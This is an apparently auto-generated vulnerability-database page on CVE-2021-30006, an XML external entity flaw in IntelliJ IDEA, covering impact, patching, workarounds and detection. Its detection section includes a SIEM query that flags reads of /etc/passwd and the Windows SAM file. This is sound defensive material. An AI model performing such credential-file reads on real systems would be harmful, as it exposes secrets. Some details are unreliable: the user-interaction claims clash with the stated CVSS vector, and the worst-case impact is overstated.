Login Sign Up

CVE-2021-30006

7.5 HIGH
XXE

📋 TL;DR

This CVE describes an XML External Entity (XXE) vulnerability in IntelliJ IDEA that allows attackers to read arbitrary files from the system. It affects users running IntelliJ IDEA versions before 2020.3.3 who process untrusted XML files within the IDE.

💻 Affected Systems

Products:
  • IntelliJ IDEA
Versions: All versions before 2020.3.3
Operating Systems: Windows, macOS, Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Vulnerability exists in XML parsing functionality; exploitation requires processing untrusted XML files within the IDE.

📦 What is this software?

Intellij Idea by Jetbrains

View all CVEs affecting Intellij Idea →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise through arbitrary file read, potentially exposing sensitive configuration files, credentials, or source code.

🟠

Likely Case

Information disclosure of local files accessible to the IDE process, potentially including project files, configuration data, or system files.

🟢

If Mitigated

Limited impact with proper input validation and XML parser configuration preventing external entity expansion.

🌐 Internet-Facing: LOW - IntelliJ IDEA is typically not directly internet-facing, though plugins or integrations could expose attack surface.
🏢 Internal Only: MEDIUM - Internal users could exploit this if they can get victims to open malicious XML files, but requires user interaction.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Exploitation requires user interaction (opening malicious XML file) and knowledge of the vulnerability.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2020.3.3 and later

Vendor Advisory: https://blog.jetbrains.com/blog/2021/05/07/jetbrains-security-bulletin-q1-2021/

Restart Required: Yes

Instructions:

1. Open IntelliJ IDEA. 2. Go to Help > Check for Updates. 3. Install version 2020.3.3 or later. 4. Restart the IDE when prompted.

🔧 Temporary Workarounds

Disable XML external entity processing

all

Configure XML parsers to disable external entity expansion

Not applicable - configuration through IDE settings or code modifications

Avoid processing untrusted XML files

all

Only open XML files from trusted sources within IntelliJ IDEA

🧯 If You Can't Patch

  • Implement strict input validation for XML files
  • Use network segmentation to limit access to sensitive systems from affected workstations

🔍 How to Verify

Check if Vulnerable:

Check IntelliJ IDEA version in Help > About. If version is below 2020.3.3, system is vulnerable.

Check Version:

On Linux/macOS: grep -i version ~/.IntelliJIdea*/config/options/ide.general.xml | head -1

Verify Fix Applied:

Verify version is 2020.3.3 or higher in Help > About dialog.

📡 Detection & Monitoring

Log Indicators:

  • Unusual file access patterns from IntelliJ IDEA process
  • XML parsing errors with external entity references

Network Indicators:

  • Outbound connections to unexpected external entities during XML processing

SIEM Query:

process_name:"idea.exe" OR process_name:"idea" AND (event_type:"file_access" AND file_path:"/etc/passwd" OR file_path:"C:\\Windows\\System32\\config\\SAM")

📊 Metadata

CVE ID: CVE-2021-30006
CVSS v3 Score: 7.5 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-611
Published: May 11, 2021
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-30006, you might also want to check these:

CVE-2022-22486 10.0

This CVE describes an XML External Entity (XXE) vulnerability in IBM Tivoli Workload Scheduler that ...

Same vulnerability type (CWE-611)
CVE-2025-30220 9.9

This XXE vulnerability in GeoServer's GeoTools Schema class allows attackers to read arbitrary files...

Same vulnerability type (CWE-611)
CVE-2023-27874 9.9

IBM Aspera Faspex 4.4.2 contains an XML external entity injection (XXE) vulnerability that allows au...

Same vulnerability type (CWE-611)